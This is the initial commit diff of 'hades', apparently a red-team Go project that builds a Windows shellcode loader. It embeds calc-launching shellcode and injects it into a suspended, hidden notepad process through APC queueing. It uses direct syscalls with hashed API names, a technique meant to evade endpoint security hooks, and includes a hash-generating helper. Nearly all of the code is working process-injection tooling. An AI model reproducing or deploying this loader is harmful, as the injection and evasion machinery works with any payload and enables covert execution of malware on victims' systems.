init

.gitignore

@@ -0,0 +1,5 @@
+.vim
+build/
+dist/
+test_files/
+test_scripts/

Makefile

@@ -0,0 +1,63 @@
+# --- Go Variables
+GO=$(shell which go)
+GOINSTALL=${GO} install
+GOGET=${GO} get
+GOBUILD=${GO} build
+GOTEST=${GO} test
+
+# --- Config Variables
+WIN_ARCHS=amd64 # 386 (not supported yet)
+COMMIT_ID=$(shell git rev-parse --short HEAD)
+TODAY=$(shell date +%d/%m/%y)
+
+ifdef VERSION
+	VERSION := $(VERSION)
+else
+	VERSION := dev
+endif
+
+# --- Project Vars
+PROJ_NAME=hades
+PROJ_MOD_PREFIX=github.com/f1zm0/hades
+BUILD_PATH=${CURDIR}/dist
+ENTRYPOINT=${CURDIR}/cmd/hades/main.go
+
+# --- Compiler Vars
+GCFLAGS=-gcflags=all=-trimpath=$(GOPATH)
+ASMFLAGS=-asmflags=all=-trimpath=$(GOPATH)
+# LDFLAGS="-s -w -H=windowsgui"
+LDFLAGS="-s -w"
+
+
+# --- Targets
+.PHONY: default
+default: build
+
+
+.PHONY: help
+## help: prints an help message with all the available targets
+help:
+	@echo "Usage: \n"
+	@sed -n 's/^##//p' ${MAKEFILE_LIST} | column -t -s ':' |  sed -e 's/^/ /'
+
+
+.PHONY: clean
+## clean: delete all binaries
+clean:
+	@if [ -d "${BUILD_PATH}" ]; then ${RM} ${BUILD_PATH}/* ; fi
+
+
+.PHONY: test
+## test: test code base using go test
+test:
+	${GOTEST} ./... -v -cover
+
+
+.PHONY: build
+## build: builds binary for Windows
+build:
+	@for ARCH in ${WIN_ARCHS}; do \
+		echo "Building binaries for Windows $${ARCH} ..."; \
+		GOOS=windows GOARCH=$${ARCH} ${GOBUILD} -ldflags=${LDFLAGS} ${GCFLAGS} ${ASMFLAGS} \
+			-o ${BUILD_PATH}/${PROJ_NAME}-win-$${ARCH}-${VERSION}.exe ${ENTRYPOINT} || exit 1;\
+	done;

README.md

@@ -0,0 +1 @@
+# hades

cmd/hades/main.go

@@ -0,0 +1,49 @@
+//go:build windows
+// +build windows
+
+package main
+
+import (
+	"fmt"
+
+	"github.com/f1zm0/hades/internal/loader"
+)
+
+func main() {
+	// pop calc
+	calcSc := []byte{
+		0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
+		0x54, 0x59, 0x50, 0x40, 0x92, 0x74, 0x15, 0x51,
+		0x64, 0x8b, 0x72, 0x2f, 0x8b, 0x76, 0x0c, 0x8b,
+		0x76, 0x0c, 0xad, 0x8b, 0x30, 0x8b, 0x7e, 0x18,
+		0xb2, 0x50, 0xeb, 0x1a, 0xb2, 0x60, 0x48, 0x29,
+		0xd4, 0x65, 0x48, 0x8b, 0x32, 0x48, 0x8b, 0x76,
+		0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48,
+		0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x57,
+		0x3c, 0x8b, 0x5c, 0x17, 0x28, 0x8b, 0x74, 0x1f,
+		0x20, 0x48, 0x01, 0xfe, 0x8b, 0x54, 0x1f, 0x24,
+		0x0f, 0xb7, 0x2c, 0x17, 0x8d, 0x52, 0x02, 0xad,
+		0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75,
+		0xef, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe,
+		0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x99, 0xff,
+		0xd7,
+	}
+
+	ldr := loader.NewLoader()
+
+	// if err := ldr.SelfInjectThread(calcSc); err !+ nil {
+	// 	fmt.Printf("An error occured:\n%s\n", err.Error())
+	// }
+
+	// if err := ldr.RemoteThreadInject(calcSc); err != nil {
+	// 	fmt.Printf("An error occured:\n%s\n", err.Error())
+	// }
+
+	if err := ldr.QueueUserAPC(calcSc); err != nil {
+		fmt.Printf("An error occured:\n%s\n", err.Error())
+	}
+
+	// reader := bufio.NewReader(os.Stdin)
+	// fmt.Print("Press enter to continue ...")
+	// _, _ = reader.ReadString('\n')
+}

cmd/hasher/main.go

@@ -0,0 +1,37 @@
+package main
+
+import (
+	"flag"
+	"fmt"
+	"os"
+	"strings"
+
+	"github.com/f1zm0/hades/pkg/hashing"
+)
+
+func main() {
+	flag.Usage = func() {
+		helpMsg := []string{
+			"Usage:",
+			"hasher '<string> [<string>...]'",
+			"",
+		}
+		fmt.Fprintf(os.Stderr, strings.Join(helpMsg, "\n"))
+	}
+
+	flag.Parse()
+
+	// Check if 1+ cli args has been specified
+	if flag.NArg() == 0 {
+		flag.Usage()
+		os.Exit(1)
+	}
+
+	djb2 := hashing.NewDJB2()
+
+	fmt.Printf("\n")
+	for _, s := range flag.Args() {
+		fmt.Printf("%s => %d\n", s, djb2.HashString(s))
+	}
+
+}

go.mod

@@ -0,0 +1,8 @@
+module github.com/f1zm0/hades
+
+go 1.17
+
+require (
+	github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee
+	golang.org/x/sys v0.0.0-20220114195835-da31bd327af9
+)

go.sum

@@ -0,0 +1,4 @@
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak=
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
+golang.org/x/sys v0.0.0-20220114195835-da31bd327af9 h1:XfKQ4OlFl8okEOr5UvAqFRVj8pY/4yfcXrddB8qAbU0=
+golang.org/x/sys v0.0.0-20220114195835-da31bd327af9/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=

internal/loader/apiwrappers.go

@@ -0,0 +1,147 @@
+//go:build windows
+// +build windows
+
+package loader
+
+import (
+	"unsafe"
+
+	"golang.org/x/sys/windows"
+)
+
+const (
+	nullptr = uintptr(0)
+)
+
+func createSuspendedProcess() (*windows.ProcessInformation, error) {
+	var si windows.StartupInfo
+	var pi windows.ProcessInformation
+
+	pCmdStr, err := windows.UTF16PtrFromString("C:\\Windows\\System32\\notepad.exe")
+	if err != nil {
+		return nil, err
+	}
+
+	if err = windows.CreateProcess(
+		nil,
+		pCmdStr,
+		nil,
+		nil,
+		false,
+		windows.CREATE_SUSPENDED|windows.CREATE_NO_WINDOW,
+		nil,
+		nil,
+		&si,
+		&pi,
+	); err != nil {
+		return nil, err
+	}
+	return &pi, nil
+}
+
+func (pl *Loader) NtAllocateVirtualMemory(
+	hProc, baseAddr uintptr,
+	memSize int,
+	allocType, protectAttr uintptr,
+) (uintptr, error) {
+	if _, err := Syscall(
+		uint16(pl.ntdllApi[int64(-8110667262648832052)].SyscallID),
+		hProc,
+		uintptr(unsafe.Pointer(&baseAddr)),
+		uintptr(unsafe.Pointer(nil)),
+		uintptr(unsafe.Pointer(&memSize)),
+		allocType,
+		protectAttr,
+	); err != nil {
+		return nullptr, err
+	}
+
+	return baseAddr, nil
+}
+
+func (pl *Loader) NtWriteVirtualMemory(
+	hProc, baseAddr uintptr,
+	buf []byte,
+	numBytesToWrite int,
+) (uintptr, error) {
+	if _, err := Syscall(
+		uint16(pl.ntdllApi[int64(-8604883203860988910)].SyscallID),
+		hProc,
+		uintptr(unsafe.Pointer(baseAddr)),
+		uintptr(unsafe.Pointer(&buf[0])),
+		uintptr(numBytesToWrite),
+		0,
+	); err != nil {
+		return nullptr, err
+	}
+
+	return nullptr, nil
+}
+
+func (pl *Loader) NtProtectVirtualMemory(
+	hProc, baseAddr uintptr,
+	memSize int,
+	newProtect uintptr,
+	oldProtect uintptr,
+) (uintptr, error) {
+	if _, err := Syscall(
+		uint16(pl.ntdllApi[int64(8609481851873969992)].SyscallID),
+		hProc,
+		uintptr(unsafe.Pointer(&baseAddr)),
+		uintptr(unsafe.Pointer(&memSize)),
+		newProtect,
+		uintptr(unsafe.Pointer(&oldProtect)),
+	); err != nil {
+		return nullptr, err
+	}
+
+	return oldProtect, nil
+}
+
+func (pl *Loader) NtCreateThreadEx(hThread, hProc, baseAddr uintptr) (uintptr, error) {
+	if _, err := Syscall(
+		uint16(pl.ntdllApi[-8677770082300808784].SyscallID),
+		uintptr(unsafe.Pointer(&hThread)), // ThreadHandle
+		windows.GENERIC_EXECUTE,           // DesiredAccess
+		0,                                 // ObjectAttributes
+		hProc,                             // ProcessHandle
+		baseAddr,                          // StartRoutine
+		0,                                 // Argument
+		uintptr(0),                        // CreateFlags
+		0,                                 // ZeroBits
+		0,                                 // StackSize
+		0,                                 // MaxStackSize
+		0,                                 // AttributeList
+	); err != nil {
+		return nullptr, err
+	}
+
+	return hThread, nil
+}
+
+func (pl *Loader) NtQueueApcThread(hThread, baseAddr uintptr) (uintptr, error) {
+	if _, err := Syscall(
+		uint16(pl.ntdllApi[-7842467120007854408].SyscallID),
+		hThread,    // ThreadHandle
+		baseAddr,   // ApcRoutine
+		uintptr(0), // ApcRoutineContext (optional)
+		0,          // ApcStatusBlock (optional)
+		0,          // ApcReserved (optional)
+	); err != nil {
+		return nullptr, err
+	}
+
+	return nullptr, nil
+}
+
+// NOT WORKING: gets called but then creashes because of invalid PC
+// func (pl *Loader) NtAlertResumeThread(hThread uintptr) (uintptr, error) {
+// 	if _, err := Syscall(
+// 		uint16(pl.ntdllApi[5863495249448612240].SyscallID),
+// 		hThread,
+// 		uintptr(0),
+// 	); err != nil {
+// 		return nullptr, err
+// 	}
+// 	return nullptr, nil
+// }